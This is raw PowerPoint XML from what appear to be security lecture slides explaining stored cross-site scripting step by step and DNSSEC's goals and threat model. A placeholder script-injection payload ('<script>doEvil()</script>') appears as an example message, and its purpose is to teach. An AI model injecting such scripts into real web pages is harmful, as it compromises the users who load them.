              <a:t> perform</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injection?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>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9" name="object 9"/>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10" name="object 10"/>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33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>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5283" y="6195905"/>
            <a:ext cx="830580" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8278784" y="1196564"/>
            <a:ext cx="3913293" cy="3420533"/>
            <a:chOff x="6209088" y="897423"/>
            <a:chExt cx="2934970" cy="2565400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>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000000"/>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7952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8891132" y="1265826"/>
              <a:ext cx="64120" cy="83103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8728849" y="1267919"/>
              <a:ext cx="415150" cy="708061"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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1" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988906"/>
            <a:ext cx="3428153" cy="755762"/>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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>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18" name="object 18"/>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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="16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Goal and Threat Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678730" y="914400"/>
            <a:ext cx="11061568" cy="5250729"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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DNS’s Role</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Maps domain names (e.g., example.com) to IP addresses (e.g., 192.168.1.1). </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US"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accurate mappings:</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might be directed to malicious sites.</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Services dependent on DNS may fail.</a:t>
            </a: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Threats</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Attackers can </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intercept</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tamper</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or </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replace</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DNS responses during transmission</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Trudy modifies responses so users are redirected to her malicious server.</a:t>
            </a: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DNSSEC Goals</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aim of DNSSEC is to ensure the correctness of the DNS responses, focusing on:</a:t>
            </a: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Ensure </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integrity</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The response hasn’t been modified.</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Ensure </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authenticity</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="20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The response comes from the legitimate source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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DNSSEC does not provide </a:t>
            </a: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confidentiality</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(responses are still readable).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lvl="1" eaLnBrk="1" hangingPunct="1"/>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63490" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="2652" t="11521" b="7789"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7780994" y="5410200"/>
            <a:ext cx="4348746" cy="1414185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64514" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="319727" y="5410200"/>
            <a:ext cx="4981575" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CB5C10-BF7A-B890-6489-18EC3E4C594F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2460008" y="5225534"/>
            <a:ext cx="1411663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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Trudy</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1884431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196564"/>
            <a:ext cx="3307080" cy="3420533"/>
            <a:chOff x="6209088" y="897423"/>
            <a:chExt cx="2480310" cy="256540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952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>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9" name="object 9"/>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0" name="object 10"/>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1" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606571" y="4724570"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8792013" y="3988906"/>
            <a:ext cx="3428153" cy="755762"/>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33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asks malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740987" y="5752199"/>
            <a:ext cx="1949027" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="539313"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>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18" name="object 18"/>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15" name="object 15"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“&lt;script&gt;doEvil()&lt;/script&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-67" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="16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196564"/>
            <a:ext cx="3307080" cy="3420533"/>
            <a:chOff x="6209088" y="897423"/>
            <a:chExt cx="2480310" cy="256540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952808" y="897423"/>
              <a:ext cx="736061" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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93" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503061"/>
            <a:ext cx="5149427" cy="1507067"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1130300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538306"/>
            <a:ext cx="1582420" cy="1494426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Victim </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
